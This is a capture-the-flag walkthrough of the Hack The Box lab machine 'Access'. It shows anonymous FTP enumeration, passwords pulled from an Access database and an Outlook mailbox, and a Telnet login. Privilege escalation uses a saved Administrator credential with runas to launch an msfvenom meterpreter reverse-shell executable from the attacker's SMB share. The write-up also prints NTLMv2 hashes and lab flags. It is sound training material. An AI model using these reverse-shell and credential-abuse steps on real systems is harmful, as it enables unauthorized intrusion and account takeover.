Access

About

Access is an “easy” difficulty machine, that highlights how machines associated with the physical security of an environment may not themselves be secure. Also highlighted is how accessible FTP/file shares often lead to getting a foothold or lateral movement. It teaches techniques for identifying and exploiting saved credentials.

Enumeration

Running the script portscan.sh reveals 3 attack vectors, FTP, Telnet and HTTP.

┌──(m0nk3y@kali)-[~/HTB/Access]
└─$ sudo portscan.sh 10.129.237.83

┌──(m0nk3y@kali)-[~/HTB/Access]
└─$ cat PortScan\(10.129.237.83\)

PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-syst:
|_  SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: PASV failed: 425 Cannot open data connection.
23/tcp open  telnet?
80/tcp open  http    Microsoft IIS httpd 7.5
|_http-title: MegaCorp
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Exploitation

FTP

As nmap revealed that anonymous FTP login is enabled, I’ll perform anonymous login to enumerate the FTP server.

┌──(m0nk3y@kali)-[~/HTB/Access]
└─$ ftp ftp://10.129.237.83 -aA
Connected to 10.129.237.83.
220 Microsoft FTP Service
331 Anonymous access allowed, send identity (e-mail name) as password.
230 User logged in.
Remote system type is Windows_NT.
200 Type set to I.
ftp> dir
200 EPRT command successful.
125 Data connection already open; Transfer starting.
08-23-18  09:16PM       <DIR>          Backups
08-24-18  10:00PM       <DIR>          Engineer

After some enumeration, I’m able to find 2 files Backups/backup.mdb and Engineer/Access Control.zip which I’ll download for further enumeration.

┌──(m0nk3y@kali)-[~/HTB/Access]
└─$ ftp ftp://10.129.237.83/Backups/backup.mdb -aAV

┌──(m0nk3y@kali)-[~/HTB/Access]
└─$ ftp 'ftp://10.129.237.83/Engineer/Access Control.zip' -aAV

First, checking the file backup.mdb reveals that it is a Microsoft Access Database file.

┌──(m0nk3y@kali)-[~/HTB/Access]
└─$ file backup.mdb
backup.mdb: Microsoft Access Database

From the database file, I’m able to extract 3 credentials admin:admin, engineer:access4u@security and backup_admin:admin.

┌──(m0nk3y@kali)-[~/HTB/Access]
└─$ mdb-tables backup.mdb --single-column
acc_antiback
acc_door
acc_firstopen
acc_firstopen_emp
acc_holidays
acc_interlock
acc_levelset
acc_levelset_door_group
acc_linkageio
acc_map
acc_mapdoorpos
acc_morecardempgroup
acc_morecardgroup
acc_timeseg
acc_wiegandfmt
ACGroup
acholiday
ACTimeZones
action_log
AlarmLog
areaadmin
att_attreport
att_waitforprocessdata
attcalclog
attexception
AuditedExc
auth_group_permissions
auth_message
auth_permission
auth_user
auth_user_groups
auth_user_user_permissions
base_additiondata
base_appoption
base_basecode
base_datatranslation
base_operatortemplate
base_personaloption
base_strresource
base_strtranslation
base_systemoption
CHECKEXACT
CHECKINOUT
dbbackuplog
DEPARTMENTS
deptadmin
DeptUsedSchs
devcmds
devcmds_bak
django_content_type
django_session
EmOpLog
empitemdefine
EXCNOTES
FaceTemp
iclock_dstime
iclock_oplog
iclock_testdata
iclock_testdata_admin_area
iclock_testdata_admin_dept
LeaveClass
LeaveClass1
Machines
NUM_RUN
NUM_RUN_DEIL
operatecmds
personnel_area
personnel_cardtype
personnel_empchange
personnel_leavelog
ReportItem
SchClass
SECURITYDETAILS
ServerLog
SHIFT
TBKEY
TBSMSALLOT
TBSMSINFO
TEMPLATE
USER_OF_RUN
USER_SPEDAY
UserACMachines
UserACPrivilege
USERINFO
userinfo_attarea
UsersMachines
UserUpdates
worktable_groupmsg
worktable_instantmsg
worktable_msgtype
worktable_usrmsg
ZKAttendanceMonthStatistics
acc_levelset_emp
acc_morecardset
ACUnlockComb
AttParam
auth_group
AUTHDEVICE
base_option
dbapp_viewmodel
FingerVein
devlog
HOLIDAYS
personnel_issuecard
SystemLog
USER_TEMP_SCH
UserUsedSClasses
acc_monitor_log
OfflinePermitGroups
OfflinePermitUsers
OfflinePermitDoors
LossCard
TmpPermitGroups
TmpPermitUsers
TmpPermitDoors
ParamSet
acc_reader
acc_auxiliary
STD_WiegandFmt
CustomReport
ReportField
BioTemplate
FaceTempEx
FingerVeinEx
TEMPLATEEx

┌──(m0nk3y@kali)-[~/HTB/Access]
└─$ mdb-export backup.mdb auth_user
id,username,password,Status,last_login,RoleID,Remark
25,"admin","admin",1,"08/23/18 21:11:47",26,
27,"engineer","access4u@security",1,"08/23/18 21:13:36",26,
28,"backup_admin","admin",1,"08/23/18 21:14:02",26,

Next, I’ll be looking at the file Access Control.zip. When trying to unzip the file, I’m requested with a password. Since the file was in the Engineer directory, I’ll test the password access4u@security which is the password for the user engineer found in backup.mdb. Fortunately, I’m able to successfully unzip the file with the password access4u@security which indicates that there is a password reuse.

┌──(m0nk3y@kali)-[~/HTB/Access]
└─$ 7z x Access\ Control.zip

7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,12 CPUs 11th Gen Intel(R) Core(TM) i5-11500 @ 2.70GHz (A0671),ASM,AES-NI)

Scanning the drive for archives:
1 file, 10870 bytes (11 KiB)

Extracting archive: Access Control.zip
--
Path = Access Control.zip
Type = zip
Physical Size = 10870


Enter password (will not be echoed):
Everything is Ok

Size:       271360
Compressed: 10870

By checking the file Access Control.pst, I’m able to discover that it is a Microsoft Outlook Personal Storage file.

┌──(m0nk3y@kali)-[~/HTB/Access]
└─$ file Access\ Control.pst
Access Control.pst: Microsoft Outlook Personal Storage (>=2003, Unicode, version 23), dwReserved1=0x234, dwReserved2=0x22f3a, bidUnused=0000000000000000, dwUnique=0x39, 271360 bytes, bCryptMethod=1, CRC32 0x744a1e2e

Using readpst, I’m able to process the file Access Control.pst to find a credential security:4Cc3ssC0ntr0ller.

┌──(m0nk3y@kali)-[~/HTB/Access]
└─$ readpst Access\ Control.pst -e
Opening PST file and indexes...
Processing Folder "Deleted Items"
	"Access Control" - 2 items done, 0 items skipped.

┌──(m0nk3y@kali)-[~/HTB/Access]
└─$ head Access\ Control/2.eml -n 30
Status: RO
From: john@megacorp.com <john@megacorp.com>
Subject: MegaCorp Access Control System "security" account
To: 'security@accesscontrolsystems.com'
Date: Thu, 23 Aug 2018 23:44:07 +0000
MIME-Version: 1.0
Content-Type: multipart/mixed;
	boundary="--boundary-LibPST-iamunique-2002325818_-_-"


----boundary-LibPST-iamunique-2002325818_-_-
Content-Type: multipart/alternative;
	boundary="alt---boundary-LibPST-iamunique-2002325818_-_-"

--alt---boundary-LibPST-iamunique-2002325818_-_-
Content-Type: text/plain; charset="utf-8"

Hi there,



The password for the “security” account has been changed to 4Cc3ssC0ntr0ller.  Please ensure this is passed on to your engineers.



Regards,

John

Finally, using telnet with the credential security:4Cc3ssC0ntr0ller retrieved, I’m able to gain a shell as the user access\security.

┌──(m0nk3y@kali)-[~/HTB/Access]
└─$ telnet 10.129.237.83
Trying 10.129.237.83...
Connected to 10.129.237.83.
Escape character is '^]'.
Welcome to Microsoft Telnet Service

login: security
password:

*===============================================================
Microsoft Telnet Server.
*===============================================================
C:\Users\security>whoami
access\security

Privilege Escalation

After some enumeration, I’m able to find that there is AppLocker in place and that many of the AppLocker bypass techniques are also blocked. After some more enumeration, I’m able to find a credential for ACCESS\Administrator stored in the Windows Vault. Since the user Administrator is often not subject to AppLocker restrictions, I’ll be able to bypass AppLocker by running exploits as Administrator using the stored credentials.

C:\Users\security>cmdkey /list

Currently stored credentials:

    Target: Domain:interactive=ACCESS\Administrator
                                                       Type: Domain Password
    User: ACCESS\Administrator

To do so, I’ll first create a EXE reverse shell payload using msfvenom.

┌──(m0nk3y@kali)-[~/HTB/Access]
└─$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.16.9 LPORT=4444 -f exe -o exploit.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of exe file: 73802 bytes
Saved as: exploit.exe

Next, by triggering the exploit via UNC path as the Administrator, I’m able to gain a shell as the user ACCESS\Administrator.

C:\Users\security>runas /user:ACCESS\Administrator /savecred \\10.10.16.9\pwn\exploit.exe

┌──(m0nk3y@kali)-[~/HTB/Access]
└─$ smbserver.py pwn . -ip 10.10.16.9
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.129.237.83,49158)
[*] AUTHENTICATE_MESSAGE (ACCESS\security,ACCESS)
[*] User ACCESS\security authenticated successfully
[*] security::ACCESS:aaaaaaaaaaaaaaaa:806e581431e67b4ca12058437f30ca4f:010100000000000080cefe5e5405da01b4768b773be26692000000000100100072005900650072006500590053004b000300100072005900650072006500590053004b0002001000590052004a006300570062007200490004001000590052004a00630057006200720049000700080080cefe5e5405da0106000400020000000800300030000000000000000000000000200000140cad2e5dafce43cc3321b0d055324527e1dacee359b58fdea9d5b7904921f60a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310036002e003900000000000000000000000000
[*] AUTHENTICATE_MESSAGE (ACCESS\Administrator,ACCESS)
[*] User ACCESS\Administrator authenticated successfully
[*] Administrator::ACCESS:aaaaaaaaaaaaaaaa:7d87a184283ed3fe2bebe29aa7355346:010100000000000080cefe5e5405da013f26392412069218000000000100100072005900650072006500590053004b000300100072005900650072006500590053004b0002001000590052004a006300570062007200490004001000590052004a00630057006200720049000700080080cefe5e5405da0106000400020000000800300030000000000000000000000000300000140cad2e5dafce43cc3321b0d055324527e1dacee359b58fdea9d5b7904921f60a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310036002e003900000000000000000000000000
[*] AUTHENTICATE_MESSAGE (\,ACCESS)
[*] User ACCESS\ authenticated successfully
[*] :::00::aaaaaaaaaaaaaaaa
[*] Disconnecting Share(1:IPC$)
[*] Disconnecting Share(2:PWN)
[*] Handle: The NETBIOS connection with the remote host timed out.
[*] Closing down connection (10.129.237.83,49158)
[*] Remaining connections []

┌──(m0nk3y@kali)-[~/HTB/Access]
└─$ msfconsole -q -x 'use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 10.10.16.9; set LPORT 4444; run'
[*] Starting persistent handler(s)...
[*] Using configured payload generic/shell_reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 10.10.16.9
LPORT => 4444
[*] Started reverse TCP handler on 10.10.16.9:4444
[*] Sending stage (175686 bytes) to 10.129.237.83
[*] Meterpreter session 1 opened (10.10.16.9:4444 -> 10.129.237.83:49159) at 2023-10-22 21:58:27 -0400

meterpreter > getuid
Server username: ACCESS\Administrator

Post Exploitation

With the shell acquired, I’m able to read the flags user.txt and root.txt.

meterpreter > cat 'C:\Users\security\Desktop\user.txt'
abcc1effe0143332dc7b9f09793539e7

meterpreter > cat 'C:\Users\Administrator\Desktop\root.txt'
405cd3a5c69056eebd26027d76078a87